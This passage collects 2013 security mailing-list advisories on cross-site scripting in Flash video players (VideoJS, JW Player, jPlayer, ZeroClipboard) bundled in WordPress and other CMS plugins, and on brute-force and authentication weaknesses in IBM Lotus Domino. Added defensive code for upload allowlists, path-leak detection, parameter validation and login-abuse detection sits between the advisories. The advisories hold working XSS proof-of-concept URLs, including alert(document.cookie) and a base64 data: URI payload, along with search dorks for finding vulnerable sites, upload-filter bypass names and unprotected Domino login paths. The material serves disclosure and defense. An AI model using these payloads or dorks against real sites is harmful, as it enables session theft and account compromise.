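    """Blocklist on the last extension only: what the three bypasses defeat."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext not in EXEC_EXT


def strict_is_allowed(path: str) -> Tuple[bool, str]:
    """Allowlist check over the whole relative path; returns (allowed, reason)."""
    normalized = path.replace("\\", "/")
    parts = normalized.split("/")
    if normalized.startswith("/") or ".." in parts or "" in parts:
        return False, "absolute path, traversal or empty component"
    for folder in parts[:-1]:
        if not FOLDER_RE.fullmatch(folder):
            return False, "folder name not allowed: %r" % folder
    name = parts[-1]
    if any(ch in name for ch in ";:\x00"):
        return False, "separator character in file name"   # IIS ';', NTFS ':' streams, NUL
    if not FILE_RE.fullmatch(name):
        return False, "file name not allowed: %r" % name     # illegal chars or 2+ extensions
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not on allowlist: %r" % ext
    return True, "ok"
```

The naive filter accepts `1.asp;.txt`, `1.asp/shell.txt` and `1.php.txt` because each ends in `.txt`; the strict one refuses all three for three different reasons, and also refuses `shell.php` outright because `php` is not on the allowlist rather than because it is on a blocklist. Storing uploads outside the web root, or with execution disabled for that directory, is the matching server-side control.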
[Full-disclosure] Vulnerabilities in multiple plugins for WordPress with VideoJS
Hello list!

These are Cross-Site Scripting vulnerabilities in multiple plugins for WordPress with VideoJS. Earlier I wrote about vulnerabilities in VideoJS (http://seclists.org/fulldisclosure/2013/May/21). This is a popular video and audio player, which is used at hundreds of thousands of web sites and in multiple web applications. The Google dork for VideoJS shows 446000 results and for WP plugins with it shows 178000 (inurl:video-js.swf inurl:wp-content/plugins/).

In addition to the plugin VideoJS - HTML5 Video Player for WordPress (http://seclists.org/fulldisclosure/2013/May/35), about which I wrote earlier, here are new plugins with this player. Among them are Video Embed & Thumbnail Generator, External "Video for Everybody", 1player, S3 Video and EasySqueezePage. But there are other vulnerable plugins for WP with video-js.swf (which can be found with the above-mentioned Google dork). All developers of these plugins, the same as developers of all other web applications with VideoJS, need to update it in their software.

- Affected products: -

Video Embed & Thumbnail Generator 4.0.3 and previous versions.
External "Video for Everybody" 2.0 and previous versions.
1player 1.2 and previous versions.
S3 Video 0.97 and previous versions.
EasySqueezePage (all versions).

Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to the mentioned XSS hole, except XSS via JS callbacks (as can be read in the repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. So update to the last version of VideoJS.swf.

- Affected vendors: -

Plugins' pages at the WordPress plugins catalog:

Video Embed & Thumbnail Generator
http://wordpress.org/extend/plugins/video-embed-thumbnail-generator/

External "Video for Everybody"
http://wordpress.org/extend/plugins/external-video-for-everybody/

1player
http://wordpress.org/extend/plugins/1player/

S3 Video
http://wordpress.org/extend/plugins/s3-video/

-- Details: --

Cross-Site Scripting (WASC-08):

Video Embed & Thumbnail Generator:
http://site/wp-content/plugins/video-embed-thumbnail-generator/video-js/video-js.swf?readyFunction=alert(document.cookie)

External "Video for Everybody":
http://site/wp-content/plugins/external-video-for-everybody/video-js/video-js.swf?readyFunction=alert(document.cookie)

1player:
http://site/wp-content/plugins/1player/players/video-js/video-js.swf?readyFunction=alert(document.cookie)

S3 Video:
http://site/wp-content/plugins/s3-video/misc/video-js.swf?readyFunction=alert(document.cookie)

EasySqueezePage:
http://site/wp-content/plugins/EasySqueezePage/videojs/video-js.swf?readyFunction=alert(document.cookie)

Timeline:

2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They thanked me and promised to fix it.
2013.02.23 - reminded VideoJS developers and asked for the date of releasing the fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent the previous letter to Zencoder's developers (since Brightcove, which acquired Zencoder, ignored the hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And made my own fix to force developers to fix the hole.
2013.04.30 - developers fixed the XSS hole in VideoJS Flash Component 3.0.2 in the source code on github.
2013.05.02 - developers compiled the fixed version of the swf (after my reminding) and uploaded it to both repositories.
2013.05.02 - tested version 3.0.2 and found that the developers haven't fixed the hole completely and informed them.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS and FPD vulnerabilities in Search and Share for WordPress
Hello list!

I want to inform you about vulnerabilities in the Search and Share plugin for WordPress. These are Cross-Site Scripting and Full path disclosure vulnerabilities. These XSS holes are in ZeroClipboard.swf, which is used in the plugin. In February I wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103) and in multiple web applications.

- Affected products: -

Vulnerable are Search and Share 0.9.3 and previous versions.

- Affected vendors: -

Latent Motion
http://www.latentmotion.com

-- Details: --

Cross-Site Scripting (WASC-08):

XSS via the id parameter and XSS via copying a payload into the clipboard.

http://site/wp-content/plugins/search-and-share/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Full path disclosure (WASC-13):

http://site/wp-content/plugins/search-and-share/SearchAndShare.php

http://site/wp-content/plugins/search-and-share/error_log
(leakage of full paths at web sites where showing errors is off and they are saved into error_log)

Timeline:

2013.02.18 - informed old and new developers of ZeroClipboard.
2013.03.26 - announced at my site.
2013.03.27 - informed developers of Search and Share.
2013.05.11 - disclosed at my site (http://websecurity.com.ua/6394/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
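The Full path disclosure entries in the posts above (AntiVirus and Exploit Scanner for WordPress, the I Love It New theme, and Search and Share, including its served error_log) all rest on one symptom: a PHP warning or fatal error carrying an absolute path reaches the client. The following added example, not code from any of those plugins, extracts such paths from a response body or an error_log excerpt so the leak can be confirmed or grepped for. The sample response bodies and log line are constructed; their paths are made up.

```python
"""Pulling disclosed file-system paths out of PHP error output.

Added example, not code from any plugin in these posts. Every 'Full path
disclosure' entry above has the same symptom: a PHP warning, notice or
fatal error that is rendered into the HTTP response (display_errors on) or
written to an error_log the web server then serves. This extracts the
absolute paths from such text, so a tester can confirm the leak and a
defender can run it over responses or logs. The sample response bodies and
the error_log excerpt are constructed for the example; their paths are
made up.
"""
import re
from typing import List

# Matches "Warning: msg in /abs/path on line N", plain or with html_errors
# <b>..</b> wrapping, and the "PHP Warning:" prefix used in error_log.
_PHP_ERROR = re.compile(
    r"(?:<b>)?(?:Warning|Notice|Fatal error|Parse error|Deprecated)(?:</b>)?:\s*"
    r"(?P<msg>.*?)\s+in\s+(?:<b>)?(?P<path>(?:[A-Za-z]:\\|/)[^<\s]+)(?:</b>)?"
    r"\s+on line\s+(?:<b>)?(?P<line>\d+)",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample: html_errors=On response from a directly requested file.
SAMPLE_HTML = (
    "<br />\n<b>Fatal error</b>:  Call to undefined function "
    "register_uninstall_hook() in "
    "<b>/var/www/site/wp-content/plugins/antivirus/uninstall.php</b> "
    "on line <b>12</b><br />\n"
)
# Constructed sample: plain-text warnings (html_errors=Off), same path twice.
SAMPLE_TEXT = (
    "Warning: include(config.php): failed to open stream: No such file or "
    "directory in /var/www/site/wp-content/plugins/antivirus/antivirus.php "
    "on line 20\n"
    "Warning: include(): Failed opening 'config.php' for inclusion in "
    "/var/www/site/wp-content/plugins/antivirus/antivirus.php on line 20\n"
)
# Constructed sample: an error_log file served by the web server.
SAMPLE_LOG = (
    "[26-Mar-2013 10:12:01 UTC] PHP Warning:  Division by zero in "
    "/var/www/site/wp-content/plugins/search-and-share/SearchAndShare.php "
    "on line 40\n"
)


def disclosed_paths(text: str) -> List[str]:
    """Distinct absolute paths disclosed by PHP errors, in order of appearance."""
    found: List[str] = []
    for m in _PHP_ERROR.finditer(text):
        if m.group("path") not in found:
            found.append(m.group("path"))
    return found


def common_root(paths: List[str]) -> str:
    """Longest common directory of the disclosed paths (the install location)."""
    if not paths:
        return ""
    split = [re.split(r"[\\/]", p) for p in paths]
    prefix = []
    for column in zip(*split):
        if len(set(column)) != 1:
            break
        prefix.append(column[0])
    sep = "\\" if "\\" in paths[0] else "/"
    return sep.join(prefix)
```

Run over a crawl of directly requested plugin and theme files, `disclosed_paths` gives the list of leaks and `common_root` the document root they reveal; on the defending side, `display_errors=Off`, `log_errors=On` with the log outside the web root, and a deny rule for files named `error_log` close all three variants at once.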
[Full-disclosure] Vulnerabilities in multiple web applications with VideoJS
Hello list!

These are Cross-Site Scripting vulnerabilities in multiple web applications with VideoJS. Earlier I wrote about vulnerabilities in VideoJS (http://seclists.org/fulldisclosure/2013/May/21). This is a popular video and audio player, which is used at hundreds of thousands of web sites and in multiple web applications. Among them are VideoJS - HTML5 Video Player for WordPress, Video.js for Drupal, bo:VideoJS for Joomla, videojs-youtube, Telemeta (CMS), and a lot of other web applications. All developers of these applications, the same as developers of all other web applications with VideoJS, need to update it in their software.

- Affected products: -

Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to the mentioned XSS hole, except XSS via JS callbacks (as can be read in the repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. So update to the last version of VideoJS.swf.

Vulnerable are the next web applications:

VideoJS - HTML5 Video Player for WordPress 3.2.3 and previous versions.
Video.js for Drupal 6.x-2.2 and previous 6.x-2.x versions and 7.x-2.2 and previous 7.x-2.x versions (only these versions are using VideoJS Flash Component).
bo:VideoJS for Joomla 2.1.1 and previous versions (with VideoJS Flash Component).
videojs-youtube (all versions).
Telemeta 1.4.4 and previous versions.

All these developers were informed last week.

- Affected vendors: -

VideoJS and VideoJS Flash Component were developed by Zencoder.
Earlier Zencoder, now Brightcove
http://videojs.com

-- Details: --

Cross-Site Scripting (WASC-08):

Original example for VideoJS:
http://site/video-js.swf?readyFunction=alert(document.cookie)

VideoJS - HTML5 Video Player for WordPress:
http://site/wp-content/plugins/videojs-html5-video-player-for-wordpress/videojs/video-js.swf?readyFunction=alert(document.cookie)

Video.js for Drupal:
http://site/sites/all/libraries/video-js/video-js.swf?readyFunction=alert(document.cookie)

bo:VideoJS for Joomla:
http://site/plugins/content/bo_videojs/video-js/video-js.swf?readyFunction=alert(document.cookie)

videojs-youtube:
http://site/lib/video-js.swf?readyFunction=alert(document.cookie)

Telemeta:
http://site/htdocs/video-js/video-js.swf?readyFunction=alert(document.cookie)

Timeline:

2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They thanked me and promised to fix it.
2013.02.23 - reminded VideoJS developers and asked for the date of releasing the fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent the previous letter to Zencoder's developers (since Brightcove, which acquired Zencoder, ignored the hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And made my own fix to force developers to fix the hole.
2013.04.30 - developers fixed the XSS hole in VideoJS Flash Component 3.0.2 in the source code on github.
2013.05.02 - developers compiled the fixed version of the swf (after my reminding) and uploaded it to both repositories.
2013.05.02 - tested version 3.0.2 and found that the developers haven't fixed the hole completely and informed them.
2013.05.03 - informed developers of VideoJS - HTML5 Video Player for WordPress.
2013.05.04 - informed developers of Video.js for Drupal, bo:VideoJS for Joomla, videojs-youtube, Telemeta. Alongside sending a letter to the developer of bo:VideoJS, I also informed Joomla VEL. They moved this extension from JED to VEL.
2013.05.05 - since the developer of videojs-youtube had no e-mails in his github account and his e-mail mentioned at different web sites was no longer working, I published my letter on github.
2013.05.07 - Telemeta developers answered and thanked me (the only ones among these developers).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Vulnerabilities in VideoJS
Hello list!

I want to inform you about vulnerabilities in VideoJS. This is a popular video and audio player, which is used at hundreds of thousands of web sites and in multiple web applications. This is a Cross-Site Scripting vulnerability in VideoJS.

There is also a DoS hole related to this player, which I found on 27.01.2013 at vine.co, which was using VideoJS Flash Component v3.0 (http://vine.co/v/b5HpgZT3ZwL). It concerned Flash Player; Adobe fixed it already on the 12th of February. More information is in my advisory for the DoS vulnerability in Adobe Flash Player (http://seclists.org/fulldisclosure/2013/Apr/9). Here is my video demonstration of a BSOD in Adobe Flash in Mozilla Firefox using VideoJS (http://www.youtube.com/watch?v=xi29KZ3LD80).

- Affected products: -

Vulnerable are versions before VideoJS Flash Component 3.0.2 and VideoJS 4.0. Versions VideoJS Flash Component 3.0.2 and VideoJS 4.0 are not vulnerable to the mentioned XSS hole, except XSS via JS callbacks (as can be read in the repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact.

This week the developers are planning to officially release VideoJS 4.0 (but the swf-file with the fixed XSS hole is already available at the video.js and video-js-swf repositories on github).

The updated version of VideoJS.swf is available in the next repositories:
https://github.com/videojs/video-js-swf
https://github.com/MustLive/video-js-swf

- Affected vendors: -

Earlier Zencoder, now Brightcove
http://videojs.com

-- Details: --

Cross-Site Scripting (WASC-08):

http://site/video-js.swf?readyFunction=alert(document.cookie)

But the fix in VideoJS Flash Component 3.0.2 is not protecting from the next attacks:

http://site/video-js.swf?readyFunction=alert
http://site/video-js.swf?readyFunction=prompt
http://site/video-js.swf?readyFunction=confirm

These are small ones and the developers don't worry about them, so after I drew their attention last week to the incomplete fix, they still released such a fix. But they will think about improving their protection in future versions.

Timeline:

2013.01.27 - found DoS (BSOD) vulnerability.
2013.01.28 - recorded video PoC. And in the night informed Adobe.
2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They thanked me and promised to fix it.
2013.02.12 - Adobe fixed the DoS vulnerability.
2013.02.23 - reminded VideoJS developers and asked for the date of releasing the fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent the previous letter to Zencoder's developers (since Brightcove, which acquired Zencoder, ignored the hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And made my own fix to force developers to fix the hole.
2013.04.30 - developers fixed the XSS hole in VideoJS Flash Component 3.0.2 in the source code on github.
2013.05.02 - developers compiled the fixed version of the swf (after my reminding) and uploaded it to both repositories.
2013.05.02 - tested version 3.0.2 and found that the developers haven't fixed the hole completely and informed them.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS vulnerability in JW Player and JW Player Pro
Hello list!

I want to warn you about a new XSS vulnerability in JW Player and JW Player Pro. Last year I wrote about multiple Content Spoofing and Cross-Site Scripting vulnerabilities in JW Player and JW Player Pro, and this is a new Cross-Site Scripting vulnerability (about which I hadn't written in 2012). In June I wrote about vulnerabilities in JW Player (http://securityvulns.ru/docs28176.html) and in August about vulnerabilities in the licensed version of the player - JW Player Pro (http://securityvulns.ru/docs28483.html). This new vulnerability concerns both versions of the player, as I verified.

- Affected products: -

Vulnerable are versions of JW Player and JW Player Pro before 5.10.2393. Tested in 5.10.2295 and previous versions. The developers fixed this and two previous strictly social XSS holes in version 5.10.2393 on 20.08.2012. Note that all versions of JW Player (with support of callbacks), including the last 6.x versions, are still vulnerable to XSS via JS callbacks (as described in my first advisory).

- Affected vendors: -

LongTail Video
http://longtailvideo.com

-- Details: --

Earlier I wrote about two strictly social XSS vulnerabilities in JW Player Pro in the logo.link and aboutlink parameters (the XSS payload executes after the user's click). And in the middle of this week I found a similar hole in the parameter link (which worked in both versions of JW Player), when I came to the developer's site (trac) to find out how they fixed these holes (since they hadn't fixed the strictly social XSS holes in May 2012, only the reflected XSS hole). I supposed that they were aware of these holes when I found them, since they had protection from javascript and vbscript URIs and I bypassed their protection with a data URI (for the previous two holes and this new hole). So they fixed all these holes in one patch in version 5.10.2393.

XSS (WASC-08):

http://site/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

For conducting this attack, besides using the parameter link, it's needed to set the parameters displayclick=link and file. If a video is set in the parameter file, then it must be the address of an existing video-file, but if an image is set, then it can be an arbitrary name of a jpg-file (even non-existent). The names of the swf-file can be different: jwplayer.swf, player.swf or others.

Timeline:

2012.05.25 - found vulnerabilities during a pentest in JW Player (in version 5.7.1896 and tested in the last version from the official site).
2012.05.29 - informed developers.
2012.05.29 - developers answered that most holes should be fixed in version 5.9.2206 (in trunk).
2012.05.31 - after checking, I informed developers that in trunk only one XSS was fixed. Then they answered that they were planning to fix all other vulnerabilities in the upcoming 6.0 version of the player.
2012.08.12 - found vulnerabilities at official web sites of one commercial CMS with JW Player Pro.
2012.08.18 - informed developers about holes in JW Player Pro.
2012.08.20 - developers fixed three strictly social XSS holes.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
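The VideoJS posts above (a `readyFunction` callback where the 3.0.2 fix still lets `alert`, `prompt` and `confirm` through) and this JW Player post (a `link` parameter whose javascript:/vbscript: filter is bypassed with a data: URI) are both blocklist fixes on a player parameter the Flash component hands to the browser. The following added example, not VideoJS or JW Player code, places each naive check beside its allowlist form and decodes the data: URI from the advisory so the test can show what it carries. The namespace names are an assumption for the example.

```python
"""Allowlisting SWF parameters that reach JavaScript or the browser's URL bar.

Added example, not VideoJS or JW Player code. Both advisories above come
down to a player parameter the Flash component hands to the browser: a
callback name (readyFunction, invoked through ExternalInterface) and a click
link (link, opened through navigateToURL). The fixes the posts describe were
blocklists: stop 'alert(document.cookie)' from parsing as a call, or refuse
javascript: and vbscript: URIs. A bare global such as 'alert' (called with
whatever argument the player supplies) and a data:text/html URI get through
both. The strict functions below are the allowlist form: a callback has to
be a dotted identifier under a namespace the embedding page owns, and a link
has to be an absolute http(s) URL. The namespace names are an assumption for
this example; data_url_body only decodes the advisory's payload.
"""
import base64
import re
from typing import Iterable, Optional
from urllib.parse import unquote, urlsplit

_IDENT = r"[A-Za-z_$][A-Za-z0-9_$]*"
_DOTTED = re.compile(r"^%s(?:\.%s)*$" % (_IDENT, _IDENT))
PAGE_NAMESPACES = ("videojs.Flash", "jwplayer.playerReady")  # assumed


def naive_callback_ok(name: str) -> bool:
    """Any dotted identifier: blocks 'alert(document.cookie)', still allows 'alert'."""
    return bool(_DOTTED.match(name))


def strict_callback_ok(name: str, namespaces: Iterable[str] = PAGE_NAMESPACES) -> bool:
    """Only callbacks living under a namespace the embedding page registered."""
    if len(name) > 128 or not _DOTTED.match(name):
        return False
    return any(name == ns or name.startswith(ns + ".") for ns in namespaces)


def naive_link_ok(url: str) -> bool:
    """Scheme blocklist, as the first fixes attempted; data: is not on it."""
    head = url.strip().lower()
    return not (head.startswith("javascript:") or head.startswith("vbscript:"))


def strict_link_ok(url: str) -> bool:
    """Scheme allowlist: only absolute http(s) URLs may be opened on click."""
    parts = urlsplit(url.strip())
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def data_url_body(url: str) -> Optional[str]:
    """Decode the body of a data: URI (base64 or percent-encoded); None otherwise."""
    if not url.lower().startswith("data:"):
        return None
    header, _, data = url[5:].partition(",")
    data = unquote(data)  # the advisory passes it through a query string (%2B for '+')
    if header.lower().endswith(";base64"):
        return base64.b64decode(data).decode("utf-8", "replace")
    return data
```

The point of the allowlist form is that it does not need to anticipate the next bypass: a callback outside the page's own namespace and a link outside http(s) are refused whatever characters or scheme they use, which is what the blocklist versions had to keep chasing.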
[Full-disclosure] BF and IA vulnerabilities in IBM Lotus Domino
Hello list! I want to warn you about Brute Force and Insufficient Authentication vulnerabilities in IBM Lotus Domino. These are vulnerabilities in Domino which I found on 03.05.2012 together with other holes.

Last year I announced multiple vulnerabilities in IBM software, and after IBM fixed many of them I disclosed them. They fixed almost all of the vulnerabilities (with a few exceptions, like Brute Force in IBM Lotus Notes Traveler) about which I informed them in May and December, and concerning the other holes they always said that they were working on them. After IBM released Domino 9.0 last month and still had not answered concerning these vulnerabilities, I reminded IBM, and they answered that they would not be fixing them.

- Affected products: -

Vulnerable are IBM Lotus Domino 8.5.3, 8.5.4, 9.0 and previous versions.

These vulnerabilities have been fixed neither in Domino 8.5.4 (released in August 2012) nor in Domino 9.0 (released in March 2013). As IBM told me recently, almost a year after I informed them about these vulnerabilities, they have not fixed them because they did not see a need for it. According to them, there are built-in mechanisms in Domino for protecting against BF and IA, so these holes are not a problem of the application (but a problem of specific web sites). I.e. they meant that owners of web sites running Lotus Domino need to configure it better for protection against these attacks.

- Affected vendors: -

IBM Domino (formerly IBM Lotus Domino)
http://www-03.ibm.com/software/products/us/en/ibmdomino/

-- Details: --

Brute Force (WASC-11):

These pages, which require authentication, have no protection against Brute Force attacks:

http://site/names.nsf
http://site/admin4.nsf
http://site/busytime.nsf
http://site/catalog.nsf
http://site/certsrv.nsf
http://site/domlog.nsf
http://site/events4.nsf
http://site/log.nsf
http://site/statrep.nsf
http://site/webadmin.nsf
http://site/web/war.nsf

There are two variants of the login form: Basic Authentication (I found it during a pentest already in 2008) and form-based authentication (I found it during a pentest in 2012, alongside the first variant). In both cases there is no protection against Brute Force.

Insufficient Authentication (WASC-01):

An unprivileged user (with any account at the site, access to which can be obtained via the Brute Force vulnerability) has access to the following pages:

https://site/names.nsf - leakage of information about all users (names, surnames, logins, e-mails and other personal information and settings)
https://site/admin4.nsf - leakage of information about administration requests, including personal information (names, surnames, logins, etc.)
https://site/catalog.nsf - leakage of important information about files on the server and about installed applications and their settings (Application Catalog), including personal information (names, surnames, logins, etc.)
https://site/events4.nsf - leakage of information about events (Monitoring Configuration)

After obtaining access to names.nsf, it's possible to use the Information Leakage vulnerability found by Leandro Meiners in 2005 (for getting password hashes), which is still not fixed. IBM hasn't fixed it in the default configuration, but only recommended removing the hash field from profiles or using salted hashes. My client used exactly the Lotus salted hashes and it hasn't helped (99% of the hashes were recovered, including the admin's one).

Timeline:

The full timeline can be read in the first advisory (http://securityvulns.ru/docs28474.html).

- During 16.05-20.05.2012 I wrote announcements about multiple vulnerabilities in IBM software on my site.
- During 16.05-20.05.2012 I sent five advisories via the contact form on IBM's site.
- On 31.05.2012 I resent the five advisories to IBM PSIRT, which they received and said they would forward to the developers (of Lotus products).
- On 18.08.2012 I reminded IBM about these holes and gave enough arguments to fix them.
- On 14.04.2013 I again reminded IBM about these holes.
- On 23.04.2013 IBM answered that they would not fix these holes.
- On 26.04.2013 I disclosed these vulnerabilities on my site (http://websecurity.com.ua/5829/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
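One check a site owner running Domino can make against the server's HTTP access log, as an added example that is not part of the advisory and is not one of IBM's built-in mechanisms: the script below reads Common Log Format lines (the widespread web-server access log format) and flags any client that produced at least ten failed logins against an .nsf database inside a 60-second window. A rejected Basic Authentication attempt appears as a 401; for the form-based variant the script assumes (an assumption, not something the advisory states) that a failed attempt is a POST to the ?Login form answered 200 with the form shown again. All log lines are constructed, and the addresses, paths and threshold are hypothetical.

```javascript
// Sliding-window detector for authentication brute force against Domino
// databases, run over Common Log Format lines. Added example; not from the
// advisory and not IBM tooling. All log lines below are constructed.

const CLF_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;
const CLF_TIME_RE = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2})/;
const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
                 Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// Parse one CLF line into { ip, ts (unix seconds), method, path, status }.
// The timezone offset is ignored: a window detector only needs consistent
// timestamps within one log, not absolute time.
function parseClfLine(line) {
  const m = CLF_RE.exec(line);
  if (!m) return null;
  const t = CLF_TIME_RE.exec(m[2]);
  if (!t || !(t[2] in MONTHS)) return null;
  const ts = Date.UTC(+t[3], MONTHS[t[2]], +t[1], +t[4], +t[5], +t[6]) / 1000;
  return { ip: m[1], ts, method: m[3], path: m[4], status: +m[5] };
}

// A request counts as a failed login when it hits an .nsf database and either
// was answered 401 (Basic Authentication rejected) or was a POST to the ?Login
// form answered 200 with the form again. The second rule is an assumption
// about Domino session authentication, not something the advisory states.
function isFailedAuth(req) {
  const [pathOnly, query = ''] = req.path.split('?');
  if (!/\.nsf$/i.test(pathOnly)) return false;
  if (req.status === 401) return true;
  return req.method === 'POST' && /^login(&|$)/i.test(query) && req.status === 200;
}

// Map ip -> { failures, first, last } for each client that produced at least
// `threshold` failed logins inside some window of `windowSec` seconds.
function detectBruteForce(lines, { threshold = 10, windowSec = 60 } = {}) {
  const perIp = new Map();
  for (const line of lines) {
    const req = parseClfLine(line);
    if (!req || !isFailedAuth(req)) continue;
    if (!perIp.has(req.ip)) perIp.set(req.ip, []);
    perIp.get(req.ip).push(req.ts);
  }
  const flagged = {};
  for (const [ip, times] of perIp) {
    times.sort((a, b) => a - b);
    let start = 0;
    let best = null;
    for (let end = 0; end < times.length; end++) {
      while (times[end] - times[start] > windowSec) start++;
      const n = end - start + 1;
      if (n >= threshold && (best === null || n > best.failures)) {
        best = { failures: n, first: times[start], last: times[end] };
      }
    }
    if (best) flagged[ip] = best;
  }
  return flagged;
}

// Constructed sample log (not captured from a real server).
function clf(ip, hhmmss, method, path, status) {
  return `${ip} - - [02/May/2013:${hhmmss} +0000] "${method} ${path} HTTP/1.1" ${status} 1234`;
}
const SAMPLE_LOG = [
  clf('198.51.100.5', '10:14:58', 'GET', '/names.nsf', 401),   // one mistyped password
  clf('198.51.100.5', '10:15:03', 'GET', '/names.nsf', 200),
  clf('198.51.100.5', '10:15:09', 'GET', '/homepage.nsf', 200),
  // 8 rejected Basic Authentication attempts against names.nsf in 16 seconds...
  ...Array.from({ length: 8 }, (_, i) =>
    clf('203.0.113.7', `10:15:${10 + 2 * i}`, 'GET', '/names.nsf', 401)),
  // ...then 4 form-based attempts against webadmin.nsf from the same client.
  ...Array.from({ length: 4 }, (_, i) =>
    clf('203.0.113.7', `10:15:${30 + 2 * i}`, 'POST', '/webadmin.nsf?Login', 200)),
];

console.log(JSON.stringify(detectBruteForce(SAMPLE_LOG), null, 2));
```

With the sample above only 203.0.113.7 is reported (12 failures in 26 seconds); the client that mistyped once is not. The two signals are deliberately combined per source address, because an attacker who is throttled on the Basic Authentication prompt can simply move to the form-based login of another database on the same server.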
[Full-disclosure] Vulnerabilities in multiple plugins for WordPress with jPlayer
Hello list! I want to inform you about multiple vulnerabilities in multiple plugins for WordPress with jPlayer. These are Cross-Site Scripting and Content Spoofing vulnerabilities. I wrote about vulnerabilities in jPlayer earlier (http://seclists.org/fulldisclosure/2013/Apr/192).

jPlayer is used in multiple web applications and particularly in multiple plugins for WordPress. A Google dork for jPlayer shows 32000 results, and for WP plugins with it 239000 (inurl:Jplayer.swf inurl:/wp-content/plugins/). Among them are MP3-jPlayer, Haiku minimalist audio player, Background Music, Jammer and WP jPlayer. These five plugins are placed in the WordPress plugins catalog with the tag "jplayer", but there are other vulnerable plugins for WP with Jplayer.swf (which can be found with the above-mentioned Google dork). All developers of these plugins, the same as the developers of all other web applications with jPlayer, need to update it in their software.

- Affected products: -

MP3-jPlayer 1.8.3 and previous versions.
Haiku minimalist audio player 1.0.0 and previous versions.
Background Music 1.0 and previous versions.
Jammer 0.2 and previous versions.
WP jPlayer 0.1 and previous versions.

The vulnerabilities are in jPlayer versions before 2.2.23. Version 2.2.23 and the last released version 2.3.0 are not vulnerable to the mentioned XSS, except CS via JS and XSS via JS callbacks. Also there are other bypass methods which work in version 2.3.0, but the developers haven't fixed them besides the attack via alert. I wrote to the developers about that already in March and reminded them again. So wait for a new version with fixes for these vulnerabilities.

- Affected vendors: -

Plugins' pages in the WordPress plugins catalog:

MP3-jPlayer
http://wordpress.org/extend/plugins/mp3-jplayer/
Haiku minimalist audio player
http://wordpress.org/extend/plugins/haiku-minimalist-audio-player/
Background Music
http://wordpress.org/extend/plugins/background-music/
Jammer
http://wordpress.org/extend/plugins/jammer/
WP jPlayer
http://wordpress.org/extend/plugins/wp-jplayer/

-- Details: --

Cross-Site Scripting (WASC-08):

Different versions of jPlayer have different XSS vulnerabilities (see the first advisory), and different WP plugins include different versions of jPlayer.

MP3-jPlayer:
http://site/wp-content/plugins/mp3-jplayer/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Haiku minimalist audio player:
http://site/wp-content/plugins/haiku-minimalist-audio-player/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Background Music:
http://site/wp-content/plugins/background-music/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Jammer:
http://site/wp-content/plugins/jammer/files/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

WP jPlayer:
http://site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?id='))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

It's possible to conduct CS (inclusion of audio/video files from external resources) via JS and XSS via JS callbacks. This requires an HTML Injection vulnerability at the site. The attack is similar to the XSS attacks via callbacks in JW Player (http://securityvulns.ru/docs28176.html).

Because this attack vector requires a separate vulnerability at the target site to conduct CS and XSS attacks using jPlayer, the developers didn't do anything to fix it. The same as the developers of JW Player. So protection from this attack scenario lies solely on web site owners.

Timeline:

2013.03.19 - informed developers of jPlayer.
2013.04.20 - developers released jPlayer 2.3.0 (http://www.jplayer.org/2.3.0/release-notes/) and informed me.
